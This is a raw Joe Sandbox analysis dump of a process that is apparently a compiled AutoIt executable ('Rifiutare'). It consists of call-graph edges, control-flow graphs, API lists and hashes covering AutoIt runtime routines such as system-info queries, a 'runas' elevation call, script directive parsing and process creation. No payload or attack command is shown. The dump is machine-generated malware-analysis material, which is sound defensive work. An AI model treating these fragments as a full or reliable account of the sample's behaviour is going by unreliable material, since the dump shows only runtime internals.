c9a25e 26 API calls 108755->108841 108758 c5922b 40 API calls 108756->108758 108760 c37dcf 108758->108760 108759 c76043 108761 c76047 108759->108761 108769 c75fa9 108759->108769 108764 c5922b 40 API calls 108760->108764 108767 c37de3 108760->108767 108763 c3c110 22 API calls 108761->108763 108762->108736 108762->108769 108766 c76050 108763->108766 108764->108767 108770 c3c110 22 API calls 108766->108770 108767->108736 108767->108762 108768 c381e9 33 API calls 108767->108768 108772 c37ca2 GetStringTypeW 108767->108772 108775 c37bb5 GetStringTypeW 108767->108775 108777 c5922b 40 API calls 108767->108777 108768->108767 108842 c9a072 82 API calls __wsopen_s 108769->108842 108771 c76059 108770->108771 108773 c34f9d 24 API calls 108771->108773 108772->108767 108774 c7606e 108773->108774 108776 c37e80 135 API calls 108774->108776 108775->108767 108776->108736 108777->108767 108778->108313 108779->108395 108780->108395 108781->108314 108782->108322 108783->108359 108784->108397 108785->108397 108786->108397 108787->108379 108788->108388 108789->108400 108790->108400 108791->108386 108792->108335 108794 c3853b 108793->108794 108795 c384ce 108793->108795 108800 c4eea9 SetFilePointerEx 108794->108800 108796 c32e8c 108795->108796 108798 c3850c ReadFile 108795->108798 108796->108663 108798->108795 108798->108796 108799->108664 108800->108795 108801->108708 108803 c38309 108802->108803 108804 c38299 108802->108804 108805 c38330 108803->108805 108809 c3831d 108803->108809 108807 c501fb 22 API calls 108804->108807 108837 c9d284 27 API calls 108805->108837 108808 c382b7 108807->108808 108816 c38340 108808->108816 108809->108804 108811 c38326 108809->108811 108836 c3770a 31 API calls 108811->108836 108815 c382da ISource 108815->108715 108817 c3835c 108816->108817 108818 c501fb 22 API calls 108817->108818 108828 c38366 __fread_nolock 108817->108828 108818->108828 108819 c76558 SetFilePointerEx 108819->108828 108820 c3847c ReadFile 108820->108828 108821 c382cb 108821->108815 108829 c3b35e MultiByteToWideChar 108821->108829 108822 c3840a 108823 c384c0 2 API calls 108822->108823 108827 c38417 __fread_nolock 108823->108827 108824 c7659a 108825 c501fb 22 API calls 108824->108825 108825->108827 108826 c32f13 3 API calls 108826->108821 108827->108821 108827->108826 108828->108819 108828->108820 108828->108821 108828->108822 108828->108824 108828->108827 108830 c3b3d1 108829->108830 108831 c3b38a 108829->108831 108832 c38e3b 22 API calls 108830->108832 108833 c3b39f MultiByteToWideChar 108831->108833 108834 c3b3c5 108832->108834 108838 c3b3da 22 API calls __fread_nolock 108833->108838 108834->108815 108836->108815 108837->108815 108838->108834 108839->108719 108840->108727 108841->108759 108842->108736 108844 c5eaa4 ___BuildCatchObject 108843->108844 108845 c5eab5 108844->108845 108846 c5eaca 108844->108846 108856 c62c38 20 API calls _abort 108845->108856 108855 c5eac5 __fread_nolock 108846->108855 108858 c595ad EnterCriticalSection 108846->108858 108848 c5eaba 108857 c62b7c 26 API calls _abort 108848->108857 108851 c5eae6 108859 c5ea22 108851->108859 108853 c5eaf1 108875 c5eb0e LeaveCriticalSection __fread_nolock 108853->108875 108855->108405 108856->108848 108857->108855 108858->108851 108860 c5ea44 108859->108860 108861 c5ea2f 108859->108861 108867 c5ea3f 108860->108867 108878 c5e02b 108860->108878 108876 c62c38 20 API calls _abort 108861->108876 108863 c5ea34 108877 c62b7c 26 API calls _abort 108863->108877 108867->108853 108870 c5dd75 __fread_nolock 26 API calls 108871 c5ea66 108870->108871 108888 c68a4f 108871->108888 108874 c62de8 _free 20 API calls 108874->108867 108875->108855 108876->108863 108877->108867 108879 c5e043 108878->108879 108880 c5e03f 108878->108880 108879->108880 108881 c5dd75 __fread_nolock 26 API calls 108879->108881 108884 c6519a 108880->108884 108882 c5e063 108881->108882 108903 c65dde 62 API calls 5 library calls 108882->108903 108885 c651b0 108884->108885 108887 c5ea60 108884->108887 108886 c62de8 _free 20 API calls 108885->108886 108885->108887 108886->108887 108887->108870 108889 c68a73 108888->108889 108890 c68a5e 108888->108890 108891 c68aae 108889->108891 108895 c68a9a 108889->108895 108904 c62c25 20 API calls _abort 108890->108904 108909 c62c25 20 API calls _abort 108891->108909 108894 c68a63 108905 c62c38 20 API calls _abort 108894->108905 108906 c68a27 108895->108906 108896 c68ab3 108910 c62c38 20 API calls _abort 108896->108910 108900 c5ea6c 108900->108867 108900->108874 108901 c68abb 108911 c62b7c 26 API calls _abort 108901->108911 108903->108880 108904->108894 108905->108900 108912 c689a5 108906->108912 108908 c68a4b 108908->108900 108909->108896 108910->108901 108911->108900 108913 c689b1 ___BuildCatchObject 108912->108913 108914 c65567 __wsopen_s EnterCriticalSection 108913->108914 108915 c689bf 108914->108915 108916 c689e6 108915->108916 108917 c689f1 108915->108917 108918 c68ace __wsopen_s 29 API calls 108916->108918 108919 c62c38 __dosmaperr 20 API calls 108917->108919 108920 c689ec 108918->108920 108919->108920 108921 c68a1b LeaveCriticalSection 108920->108921 108922 c68a0e __fread_nolock 108921->108922 108922->108908 108928 c3be5e 108923->108928 108929 c3bd41 108923->108929 108924 c3beb6 22 API calls 108924->108929 108926 c38600 86 API calls 108926->108929 108927 c38c8d 22 API calls 108927->108929 108928->108161 108929->108924 108929->108926 108929->108927 108929->108928 108932 ca129d 22 API calls 108929->108932 108930->108164 108931->108166 108932->108929 108933->108176 108935 c34d89 __fread_nolock 108934->108935 108936 c34d62 108934->108936 108935->108187 108936->108935 108937 c501fb 22 API calls 108936->108937 108938 c747af __fread_nolock 108937->108938 108939->108188 108941 c54ffb _abort 108940->108941 108942 c55014 108941->108942 108943 c55002 108941->108943 108964 c6337e EnterCriticalSection 108942->108964 108979 c55149 GetModuleHandleW 108943->108979 108946 c55007 108946->108942 108980 c5518d GetModuleHandleExW 108946->108980 108947 c550b9 108968 c550f9 108947->108968 108951 c55090 108955 c550a8 108951->108955 108959 c627b1 _abort 5 API calls 108951->108959 108953 c550d6 108971 c55108 108953->108971 108954 c55102 108988 c72149 5 API calls _ValidateLocalCookies 108954->108988 108960 c627b1 _abort 5 API calls 108955->108960 108959->108955 108960->108947 108961 c5501b 108961->108947 108961->108951 108965 c62538 108961->108965 108964->108961 108989 c62271 108965->108989 109008 c633c6 LeaveCriticalSection 108968->109008 108970 c550d2 108970->108953 108970->108954 109009 c63a2c 108971->109009 108974 c55136 108977 c5518d _abort 8 API calls 108974->108977 108975 c55116 GetPEB 108975->108974 108976 c55126 GetCurrentProcess TerminateProcess 108975->108976 108976->108974 108978 c5513e ExitProcess 108977->108978 108979->108946 108981 c551b7 GetProcAddress 108980->108981 108982 c551da 108980->108982 108987 c551cc 108981->108987 108983 c551e0 FreeLibrary 108982->108983 108984 c551e9 108982->108984 108983->108984 108985 c50eac _ValidateLocalCookies 5 API calls 108984->108985 108986 c55013 108985->108986 108986->108942 108987->108982 108992 c62220 108989->108992 108991 c62295 108991->108951 108993 c6222c ___BuildCatchObject 108992->108993 109000 c6337e EnterCriticalSection 108993->109000 108995 c6223a 109001 c622c1 108995->109001 108999 c62258 __fread_nolock 108999->108991 109000->108995 109004 c622e9 109001->109004 109005 c622e1 109001->109005 109002 c50eac _ValidateLocalCookies 5 API calls 109003 c62247 109002->109003 109007 c62265 LeaveCriticalSection _abort 109003->109007 109004->109005 109006 c62de8 _free 20 API calls 109004->109006 109005->109002 109006->109005 109007->108999 109008->108970 109010 c63a47 109009->109010 109011 c63a51 109009->109011 109013 c50eac _ValidateLocalCookies 5 API calls 109010->109013 109016 c633f7 5 API calls 2 library calls 109011->109016 109014 c55112 109013->109014 109014->108974 109014->108975 109015 c63a68 109015->109010 109016->109015

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 503 c329a4-c32a13 call c39091 GetVersionExW call c3b0db 508 c73713-c73726 503->508 509 c32a19 503->509 510 c73727-c7372b 508->510 511 c32a1b-c32a1d 509->511 512 c7372e-c7373a 510->512 513 c7372d 510->513 514 c32a23-c32a7d call c399c5 call c33249 511->514 515 c73752 511->515 512->510 516 c7373c-c7373e 512->516 513->512 528 c32a83-c32a85 514->528 529 c73869-c73870 514->529 519 c73759-c73765 515->519 516->511 518 c73744-c7374b 516->518 518->508 521 c7374d 518->521 522 c32ae3-c32afd GetCurrentProcess IsWow64Process 519->522 521->515 525 c32aff 522->525 526 c32b5c-c32b62 522->526 527 c32b05-c32b11 525->527 526->527 532 c32b17-c32b26 LoadLibraryA 527->532 533 c738ae-c738b2 GetSystemInfo 527->533 530 c32a8b-c32a8e 528->530 531 c7376a-c7377d 528->531 534 c73872 529->534 535 c73890-c73893 529->535 530->522 538 c32a90-c32acc 530->538 541 c737a6-c737a8 531->541 542 c7377f-c73788 531->542 539 c32b64-c32b6e GetSystemInfo 532->539 540 c32b28-c32b36 GetProcAddress 532->540 543 c73878 534->543 536 c73895-c738a4 535->536 537 c7387e-c73886 535->537 536->543 547 c738a6-c738ac 536->547 537->535 538->522 548 c32ace-c32ad7 538->548 544 c32b3e-c32b40 539->544 540->539 549 c32b38-c32b3c GetNativeSystemInfo 540->549 545 c737dd-c737e0 541->545 546 c737aa-c737bf 541->546 550 c73795-c737a1 542->550 551 c7378a-c73790 542->551 543->537 557 c32b42-c32b43 FreeLibrary 544->557 558 c32b49-c32b5b 544->558 554 c737e2-c737fd 545->554 555 c7381b-c7381e 545->555 552 c737c1-c737c7 546->552 553 c737cc-c737d8 546->553 547->537 548->519 556 c32add 548->556 549->544 550->522 551->522 552->522 553->522 559 c737ff-c73805 554->559 560 c7380a-c73816 554->560 555->522 561 c73824-c7384b 555->561 556->522 557->558 559->522 560->522 562 c7384d-c73853 561->562 563 c73858-c73864 561->563 562->522 563->522
                                                                                APIs
                                                                                • GetVersionExW.KERNEL32(?), ref: 00C329D3
                                                                                  • Part of subcall function 00C3B0DB: _wcslen.LIBCMT ref: 00C3B0EE
                                                                                • GetCurrentProcess.KERNEL32(?,00CCD958,00000000,?,?), ref: 00C32AEA
                                                                                • IsWow64Process.KERNEL32(00000000,?,?), ref: 00C32AF1
                                                                                • LoadLibraryA.KERNEL32(kernel32.dll,?,?), ref: 00C32B1C
                                                                                • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00C32B2E
                                                                                • GetNativeSystemInfo.KERNELBASE(?,?,?), ref: 00C32B3C
                                                                                • FreeLibrary.KERNEL32(00000000,?,?), ref: 00C32B43
                                                                                • GetSystemInfo.KERNEL32(?,?,?), ref: 00C32B68
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000007.00000002.1742302453.0000000000C31000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C30000, based on PE: true
                                                                                • Associated: 00000007.00000002.1742251898.0000000000C30000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742433362.0000000000CCD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742433362.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742573979.0000000000CFD000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742616192.0000000000D05000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_7_2_c30000_Rifiutare.jbxd
                                                                                Similarity
                                                                                • API ID: InfoLibraryProcessSystem$AddressCurrentFreeLoadNativeProcVersionWow64_wcslen
                                                                                • String ID: GetNativeSystemInfo$kernel32.dll
                                                                                • API String ID: 3290436268-192647395
                                                                                • Opcode ID: 21e6a9627fd4aa9bad3c2c99f5ee8c0a2c76947ae18d035123b526c94137bb49
                                                                                • Instruction ID: f710b0ab76bad5811b35854f509d786c1b054c8cb0371b256b63e8fab07ee474
                                                                                • Opcode Fuzzy Hash: 21e6a9627fd4aa9bad3c2c99f5ee8c0a2c76947ae18d035123b526c94137bb49
                                                                                • Instruction Fuzzy Hash: 68918F7291F3C0CFCB16DB697C497BA7F64AB66300B1888ADE18DD3365D6284605DB32

                                                                                Control-flow Graph

                                                                                APIs
                                                                                • GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,?,?,00C3292D,?), ref: 00C3334E
                                                                                • IsDebuggerPresent.KERNEL32(?,?,?,?,?,?,00C3292D,?), ref: 00C33361
                                                                                • GetFullPathNameW.KERNEL32(00007FFF,?,?,00D02408,00D023F0,?,?,?,?,?,?,00C3292D,?), ref: 00C333CD
                                                                                  • Part of subcall function 00C3B0DB: _wcslen.LIBCMT ref: 00C3B0EE
                                                                                  • Part of subcall function 00C345A6: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,00C333F5,00D02408,?,?,?,?,?,?,?,00C3292D,?), ref: 00C345E7
                                                                                • SetCurrentDirectoryW.KERNEL32(?,00000001,00D02408,?,?,?,?,?,?,?,00C3292D,?), ref: 00C3344E
                                                                                • MessageBoxA.USER32(00000000,It is a violation of the AutoIt EULA to attempt to reverse engineer this program.,AutoIt,00000010), ref: 00C73E23
                                                                                • SetCurrentDirectoryW.KERNEL32(?,00D02408,?,?,?,?,?,?,?,00C3292D,?), ref: 00C73E64
                                                                                • GetForegroundWindow.USER32(runas,?,?,?,00000001,?,00CF31F4,00D02408,?,?,?,?,?,?,?,00C3292D), ref: 00C73EED
                                                                                • ShellExecuteW.SHELL32(00000000,?,?), ref: 00C73EF4
                                                                                  • Part of subcall function 00C33466: GetSysColorBrush.USER32(0000000F), ref: 00C33471
                                                                                  • Part of subcall function 00C33466: LoadCursorW.USER32(00000000,00007F00), ref: 00C33480
                                                                                  • Part of subcall function 00C33466: LoadIconW.USER32(00000063), ref: 00C33496
                                                                                  • Part of subcall function 00C33466: LoadIconW.USER32(000000A4), ref: 00C334A8
                                                                                  • Part of subcall function 00C33466: LoadIconW.USER32(000000A2), ref: 00C334BA
                                                                                  • Part of subcall function 00C33466: LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00C334D2
                                                                                  • Part of subcall function 00C33466: RegisterClassExW.USER32(?), ref: 00C33523
                                                                                  • Part of subcall function 00C33546: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00C33574
                                                                                  • Part of subcall function 00C33546: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00C33595
                                                                                  • Part of subcall function 00C33546: ShowWindow.USER32(00000000,?,?,?,?,?,?,00C3292D,?), ref: 00C335A9
                                                                                  • Part of subcall function 00C33546: ShowWindow.USER32(00000000,?,?,?,?,?,?,00C3292D,?), ref: 00C335B2
                                                                                  • Part of subcall function 00C33DF8: Shell_NotifyIconW.SHELL32(00000000,?), ref: 00C33EC9
                                                                                Strings
                                                                                • AutoIt, xrefs: 00C73E18
                                                                                • It is a violation of the AutoIt EULA to attempt to reverse engineer this program., xrefs: 00C73E1D
                                                                                • runas, xrefs: 00C73EE8
                                                                                Memory Dump Source
                                                                                • Source File: 00000007.00000002.1742302453.0000000000C31000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C30000, based on PE: true
                                                                                • Associated: 00000007.00000002.1742251898.0000000000C30000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742433362.0000000000CCD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742433362.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742573979.0000000000CFD000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742616192.0000000000D05000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_7_2_c30000_Rifiutare.jbxd
                                                                                Similarity
                                                                                • API ID: LoadWindow$Icon$CurrentDirectory$CreateFullNamePathShow$BrushClassColorCursorDebuggerExecuteForegroundImageMessageNotifyPresentRegisterShellShell__wcslen
                                                                                • String ID: AutoIt$It is a violation of the AutoIt EULA to attempt to reverse engineer this program.$runas
                                                                                • API String ID: 683915450-2030392706
                                                                                • Opcode ID: d3e41a3b6953f1b9ad78b0b16ac67f93d7875c864725f59b6e702c5fe6482ddf
                                                                                • Instruction ID: a55ff8bd1799642bcce06cf67aa36f6fdc5fa5a31f0ca0abfa493561618b99ec
                                                                                • Opcode Fuzzy Hash: d3e41a3b6953f1b9ad78b0b16ac67f93d7875c864725f59b6e702c5fe6482ddf
                                                                                • Instruction Fuzzy Hash: E851D7712193816EC719EF61EC85F7F7BA8DB95700F04052CF596822A2CA749B49F732
                                                                                APIs
                                                                                • GetFileAttributesW.KERNELBASE(?,00C76043), ref: 00C9E344
                                                                                • FindFirstFileW.KERNELBASE(?,?), ref: 00C9E355
                                                                                • FindClose.KERNEL32(00000000), ref: 00C9E365
                                                                                Memory Dump Source
                                                                                • Source File: 00000007.00000002.1742302453.0000000000C31000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C30000, based on PE: true
                                                                                • Associated: 00000007.00000002.1742251898.0000000000C30000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742433362.0000000000CCD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742433362.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742573979.0000000000CFD000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742616192.0000000000D05000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_7_2_c30000_Rifiutare.jbxd
                                                                                Similarity
                                                                                • API ID: FileFind$AttributesCloseFirst
                                                                                • String ID:
                                                                                • API String ID: 48322524-0
                                                                                • Opcode ID: ee219b3360390afb8144ec4435a40bf86f903f8fa0ecf5450fc247caf91cfaa8
                                                                                • Instruction ID: 3641f1edf8e4cb57ac3b7b578d2b1a43c55a4e12d62119a39372db52f4520d78
                                                                                • Opcode Fuzzy Hash: ee219b3360390afb8144ec4435a40bf86f903f8fa0ecf5450fc247caf91cfaa8
                                                                                • Instruction Fuzzy Hash: 99E04F318149106B9610AB38EC0E9EEB75CBB15335F100725F976C21F0EB70AE458696
                                                                                APIs
                                                                                • GetCurrentProcess.KERNEL32(00000003,?,00C550DE,00000003,00CF9820,0000000C,00C55235,00000003,00000002,00000000,?,00C62D05,00000003), ref: 00C55129
                                                                                • TerminateProcess.KERNEL32(00000000,?,00C550DE,00000003,00CF9820,0000000C,00C55235,00000003,00000002,00000000,?,00C62D05,00000003), ref: 00C55130
                                                                                • ExitProcess.KERNEL32 ref: 00C55142
                                                                                Memory Dump Source
                                                                                • Source File: 00000007.00000002.1742302453.0000000000C31000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C30000, based on PE: true
                                                                                • Associated: 00000007.00000002.1742251898.0000000000C30000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742433362.0000000000CCD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742433362.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742573979.0000000000CFD000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742616192.0000000000D05000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_7_2_c30000_Rifiutare.jbxd
                                                                                Similarity
                                                                                • API ID: Process$CurrentExitTerminate
                                                                                • String ID:
                                                                                • API String ID: 1703294689-0
                                                                                • Opcode ID: 23508c14df1b4af015f8aaf13055eae9095a9bba79ef8f8f4fe2b86f2ffb7f9e
                                                                                • Instruction ID: a097ea9204d343037bf7dd19e44c7f11c454693f746f80159c493169a4c421e4
                                                                                • Opcode Fuzzy Hash: 23508c14df1b4af015f8aaf13055eae9095a9bba79ef8f8f4fe2b86f2ffb7f9e
                                                                                • Instruction Fuzzy Hash: B2E09235410A88ABCB216FA4DD29F5D3F79AB40392F094024F8168A132DB35DE86EA84

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 0 c37cdd-c37d0d call c5022b call c501fb 5 c37d36-c37d48 call c5922b 0->5 6 c37d0f-c37d11 0->6 8 c37d12-c37d18 5->8 12 c37d4a-c37d5c call c5922b 5->12 6->8 10 c37d1a-c37d2a call c501ed call c50234 8->10 11 c37d2d-c37d33 8->11 10->11 19 c37d62-c37d74 call c5922b 12->19 20 c75f38-c75f3a 12->20 23 c75f3f-c75f42 19->23 24 c37d7a-c37d8c call c5922b 19->24 20->8 23->8 27 c75f47-c75f7e call c37a0c call c37bb5 call c37ca2 call c54d83 24->27 28 c37d92-c37da4 call c5922b 24->28 59 c75f80-c75f8b 27->59 60 c75fbb-c75fbe 27->60 33 c75fe1-c75fe6 28->33 34 c37daa-c37dbc call c5922b 28->34 33->8 38 c75fec-c7600d CompareStringW 33->38 45 c37dc2-c37dd4 call c5922b 34->45 46 c76034-c76045 call c9a25e 34->46 41 c7601f-c76027 38->41 42 c7600f-c76012 38->42 41->8 44 c7602d 41->44 42->41 43 c76014-c76018 42->43 43->38 48 c7601a 43->48 44->46 57 c37dd6-c37de8 call c5922b 45->57 58 c37dee 45->58 55 c76047-c7608f call c3c110 * 2 call c34f9d call c37e80 call c3774c * 2 46->55 56 c76099-c7609f 46->56 48->8 77 c760c1-c760c3 55->77 104 c76091-c76094 55->104 61 c760b2-c760bc call c9a072 56->61 57->8 57->58 66 c37df1-c37dfd call c381e9 58->66 59->60 67 c75f8d-c75f94 59->67 62 c75fc0-c75fce 60->62 63 c75fa9-c75fb6 call c50234 60->63 61->77 76 c75fd3-c75fdc call c50234 62->76 63->61 80 c37e03-c37e26 call c37ca2 call c37bb5 call c5922b 66->80 81 c760a1-c760a6 66->81 67->63 68 c75f96-c75f9a 67->68 68->63 74 c75f9c-c75fa7 68->74 74->76 76->8 77->8 100 c37e78-c37e7b 80->100 101 c37e28-c37e3a call c5922b 80->101 81->8 86 c760ac-c760ad 81->86 86->61 100->66 101->100 106 c37e3c-c37e4e call c5922b 101->106 104->8 109 c37e50-c37e62 call c5922b 106->109 110 c37e64-c37e6d 106->110 109->66 109->110 110->8 111 c37e73 110->111 111->66
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000007.00000002.1742302453.0000000000C31000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C30000, based on PE: true
                                                                                • Associated: 00000007.00000002.1742251898.0000000000C30000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742433362.0000000000CCD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742433362.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742573979.0000000000CFD000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742616192.0000000000D05000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_7_2_c30000_Rifiutare.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: "$#OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$'$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
                                                                                • API String ID: 0-1645009161
                                                                                • Opcode ID: 4fa1ff8e54f20d9a2361f168c0f5d760622ce62b8e955769e17f15ca0cf12736
                                                                                • Instruction ID: 4d1ab3a9db24d715a94426384f2df9371c105a32feb7086ec81975eb2e26cf98
                                                                                • Opcode Fuzzy Hash: 4fa1ff8e54f20d9a2361f168c0f5d760622ce62b8e955769e17f15ca0cf12736
                                                                                • Instruction Fuzzy Hash: 439105B1604605BBCF21AF64DC42FBE37A8AF05300F148164FD09AB182EB71DE55E7A5

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 114 cbb779-cbb7d6 call c52760 117 cbb7d8-cbb7eb call c3ce08 114->117 118 cbb814-cbb818 114->118 126 cbb848 117->126 127 cbb7ed-cbb812 call c3ce08 * 2 117->127 120 cbb81a-cbb83b call c3ce08 * 2 118->120 121 cbb85d-cbb860 118->121 144 cbb83f-cbb844 120->144 123 cbb862-cbb865 121->123 124 cbb875-cbb899 call c3c966 call c37a0c 121->124 128 cbb868-cbb86d call c3ce08 123->128 146 cbb958-cbb960 124->146 147 cbb89f-cbb8f8 call c3c966 call c37a0c call c3c966 call c37a0c call c3c966 call c37a0c 124->147 131 cbb84b-cbb84f 126->131 127->144 128->124 136 cbb859-cbb85b 131->136 137 cbb851-cbb857 131->137 136->121 136->124 137->128 144->121 148 cbb846 144->148 149 cbb98a-cbb9b8 GetCurrentDirectoryW call c5022b GetCurrentDirectoryW 146->149 150 cbb962-cbb97d call c3c966 call c37a0c 146->150 196 cbb8fa-cbb915 call c3c966 call c37a0c 147->196 197 cbb926-cbb956 GetSystemDirectoryW call c5022b GetSystemDirectoryW 147->197 148->131 158 cbb9bc 149->158 150->149 167 cbb97f-cbb988 call c54d83 150->167 161 cbb9c0-cbb9c4 158->161 164 cbb9c6-cbb9f0 call c3600d * 3 161->164 165 cbb9f5-cbba05 call ca0940 161->165 164->165 178 cbba0b-cbba61 call ca101a call ca0f40 call ca0e01 165->178 179 cbba07-cbba09 165->179 167->149 167->165 182 cbba6e-cbba72 178->182 210 cbba63 178->210 179->182 185 cbbb1a-cbbb3e CreateProcessW 182->185 186 cbba78-cbbaa1 call c91a42 182->186 190 cbbb41-cbbb54 call c50234 * 2 185->190 201 cbbaaa call c91d48 186->201 202 cbbaa3-cbbaa8 call c91a7b 186->202 216 cbbbaf-cbbbbd CloseHandle 190->216 217 cbbb56-cbbb68 190->217 196->197 219 cbb917-cbb920 call c54d83 196->219 197->158 214 cbbaaf-cbbabc call c54d83 201->214 202->214 210->182 226 cbbabe-cbbac5 214->226 227 cbbac7-cbbad7 call c54d83 214->227 221 cbbbbf-cbbbc4 216->221 222 cbbc1c 216->222 223 cbbb6a 217->223 224 cbbb6d-cbbb7c 217->224 219->161 219->197 228 cbbbd1-cbbbd6 221->228 229 cbbbc6-cbbbcc CloseHandle 221->229 232 cbbc20-cbbc24 222->232 223->224 230 cbbb7e 224->230 231 cbbb81-cbbbaa GetLastError call c31216 call c3d720 224->231 226->226 226->227 249 cbbad9-cbbae0 227->249 250 cbbae2-cbbaf2 call c54d83 227->250 235 cbbbd8-cbbbde CloseHandle 228->235 236 cbbbe3-cbbbe8 228->236 229->228 230->231 240 cbbc65-cbbc76 call ca09d9 231->240 238 cbbc32-cbbc3c 232->238 239 cbbc26-cbbc30 232->239 235->236 244 cbbbea-cbbbf0 CloseHandle 236->244 245 cbbbf5-cbbc1a call ca121d call cbbcb6 236->245 241 cbbc3e 238->241 242 cbbc44-cbbc63 call c3d720 CloseHandle 238->242 239->240 241->242 242->240 244->245 245->232 249->249 249->250 260 cbbafd-cbbb18 call c50234 * 3 250->260 261 cbbaf4-cbbafb 250->261 260->190 261->260 261->261
                                                                                APIs
                                                                                • _wcslen.LIBCMT ref: 00CBB918
                                                                                • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00CBB930
                                                                                • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00CBB954
                                                                                • _wcslen.LIBCMT ref: 00CBB980
                                                                                • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 00CBB994
                                                                                • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 00CBB9B6
                                                                                • _wcslen.LIBCMT ref: 00CBBAB2
                                                                                  • Part of subcall function 00CA0E01: GetStdHandle.KERNEL32(000000F6), ref: 00CA0E20
                                                                                • _wcslen.LIBCMT ref: 00CBBACB
                                                                                • _wcslen.LIBCMT ref: 00CBBAE6
                                                                                • CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00CBBB36
                                                                                • GetLastError.KERNEL32(00000000), ref: 00CBBB87
                                                                                • CloseHandle.KERNEL32(?), ref: 00CBBBB9
                                                                                • CloseHandle.KERNEL32(00000000), ref: 00CBBBCA
                                                                                • CloseHandle.KERNEL32(00000000), ref: 00CBBBDC
                                                                                • CloseHandle.KERNEL32(00000000), ref: 00CBBBEE
                                                                                • CloseHandle.KERNEL32(?), ref: 00CBBC63
                                                                                Memory Dump Source
                                                                                • Source File: 00000007.00000002.1742302453.0000000000C31000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C30000, based on PE: true
                                                                                • Associated: 00000007.00000002.1742251898.0000000000C30000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742433362.0000000000CCD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742433362.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742573979.0000000000CFD000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742616192.0000000000D05000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_7_2_c30000_Rifiutare.jbxd
                                                                                Similarity
                                                                                • API ID: Handle$Close_wcslen$Directory$CurrentSystem$CreateErrorLastProcess
                                                                                • String ID:
                                                                                • API String ID: 2178637699-0
                                                                                • Opcode ID: fc1b201582f2148833a866e6a6110cc36f7a050c3c17633bad3d88d62c17dd8b
